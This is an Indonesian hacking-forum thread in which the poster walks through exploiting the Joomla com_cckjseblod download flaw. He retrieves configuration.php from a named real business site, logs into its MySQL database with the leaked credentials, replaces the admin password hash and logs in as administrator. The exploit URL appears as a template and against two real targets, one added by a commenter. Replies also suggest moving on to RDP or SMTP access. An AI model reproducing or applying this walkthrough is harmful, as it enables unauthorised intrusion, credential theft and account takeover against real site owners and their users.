Vuln Joomla with option=com_cckjseblod

**cyberking** · 11-04-2015, 02:45 PM

Selamat Siang =))
kali ini kita sharing tentang bug di option jomla yaitu com_cckjseblod, sekilas ane bacanya ccktusbol wkwkw =))
ternyata salah

oke nemu target www[dot]athenameetings[dot]com
entah kenapa target di lingkup bisnis terus..

jadi gini, pada bug tersebut kita dapat melakukan download file configuration.php yang pada dasarnya merupakan file config joomla, nah di dalam file tersebut ada data FTP, MYSQL, SMPT dll, yang kerennya di web ini ane nemu smtp nya yang gogle, jadi masuk ke gmail, dan parahnya gmailnya butuh verifikasi lagi huhuhu

[Image: qVFIzZj.png]

gambar : http://i.imgur.com/qVFIzZj.png

make bahasa aneh, ane ga ngerti walau ada translate juga wkwk

oke langsung aja untuk download file configurasinya seperti ini:
sitetarget.com/pathjoomlanya/index.php?option=com_cckjseblod&task=download&file=configuration.php

nah contoh dari taget ane gini :
www.athenameetings.com/index.php?option=com_cckjseblod&task=download&file=configuration.php

dan w00t!! dapet file configurationnya Big Grin

oke lanjut lagi ngapain cuma sampe disitu, kentang (kenyang tanggung) namanya ahahah

kita lihat isi file configuration.php tersebut

[Image: DtpvQAz.png]

gambar: http://i.imgur.com/DtpvQAz.png

nah dari email mah uda liat kan gimana haha ane bisa masuk tp butuh jawab pertanyaan lagi nih, sekarang kita masuk ke mysqlnya aja wakakak

[Image: 4i5gEBP.png]

gambar: http://i.imgur.com/4i5gEBP.png

dan w00tt bisa masuk euy wakakak sekarang ngapain?
check aja tables jos_users nya dulu kan itu table super admin joomla..

[Image: YHPe0Cq.png]

gambar: http://i.imgur.com/YHPe0Cq.png

hayoloo passwordnya wkwk
udeh gausa pusing, kita ganti aja passwordnya dengan password standart 123 di hash ke joomla, jadi gini:
531b5f50f082c59730b3bf7f9c457129:GA8lZqlJVZQbD8GYFGltJGNNIvjmcRcT

[Image: IK13ISz.png]

gambar: http://i.imgur.com/IK13ISz.png

nahh tinggal login dah:
user: admin
pass: 123

[Image: DFAI1Fx.png]

w00t!! g0t it!!

terus mau ngapain ? wakakak cari tau ndiri deh haha

**djoe** · 11-04-2015, 07:19 PM

gurih nih....
wahh bisa remote mysql dari client ya Big Grin

..

semisal ngak bisa remote mysql dari client dan ngak bisa ftp dari client giman om ?
klu ndak salah sitenya itu pke windows server ...hehehehehe. siapa tau dapat RDP hehehehe

**wine trochanter** · 11-04-2015, 07:24 PM

kerenn tekniknya Big Grin

ijin belajar dulu dan

**cyberking** · 11-04-2015, 07:27 PM

(11-04-2015, 07:19 PM)djoe Wrote: gurih nih....
wahh bisa remote mysql dari client ya ..

semisal ngak bisa remote mysql dari client dan ngak bisa ftp dari client giman om ?
klu ndak salah sitenya itu pke windows server ...hehehehehe. siapa tau dapat RDP hehehehe

kalau ndak bisa ya kali smtpnya bisa digunain, ngakalin dari yang uda dapet aja lalu kembangin =))

**cyberking** · 11-04-2015, 07:28 PM

(11-04-2015, 07:24 PM)wine trochanter Wrote: kerenn tekniknya
ijin belajar dulu dan

siap dok, yg penting jangan bawa saya ke ruang paru =))

**Clound_Carbelius** · 11-04-2015, 07:37 PM

Nyimak..

Pkoe Joss.. (y) =))

**cyberking** · 11-04-2015, 10:40 PM

(11-04-2015, 07:37 PM)Clound_Carbelius Wrote: Nyimak..
Pkoe Joss.. (y) =))

yoomsss =))

**hamdan_zenith** · 11-04-2015, 10:44 PM

enggak semua bisa di remote mysql yaa om ? :/
tapi keren tutornya omm,, josss

**djoe** · 11-05-2015, 12:05 AM

(11-04-2015, 10:44 PM)hamdan_zenith Wrote: enggak semua bisa di remote mysql yaa om ? :/
tapi keren tutornya omm,, josss

iya , biasanya yang servernya linux , ngak bisa di remote dari client (dari luar enviroment nya) bisa jadi karen di blok sama firewall Big Grin

**hehehe** · 11-05-2015, 01:01 AM

sobat siberrking emang ngerii di dunia maya :v

makasih bro...dicicipin dlu trik nya

ini juga http://www[dot]starmarketingonline[dot]com/index.php?option=com_cckjseblod&task=download&file=configuration.php